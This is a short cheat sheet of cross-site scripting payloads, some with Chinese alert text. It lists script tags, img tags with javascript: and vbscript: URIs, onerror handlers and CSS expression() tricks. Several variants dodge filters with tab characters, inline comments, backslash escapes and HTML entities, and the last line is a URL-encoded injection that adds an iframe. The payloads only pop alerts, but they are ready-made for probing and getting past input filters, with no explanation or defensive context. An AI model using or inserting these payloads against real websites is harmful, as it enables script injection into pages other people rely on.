<script>alert("跨站")</script> (most common)
<img src=javascript:alert("跨站")></img>
<img src="javascript: alert(/跨站/)></img>
<img src="javas????cript:alert(/跨站/)" width=150></img> (the ???? stands for whitespace entered with the Tab key)
<img src="#" onerror=alert(/跨站/)></img>
<img src="#" style="xss:expression(alert(/xss/));"></img>
<img src="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["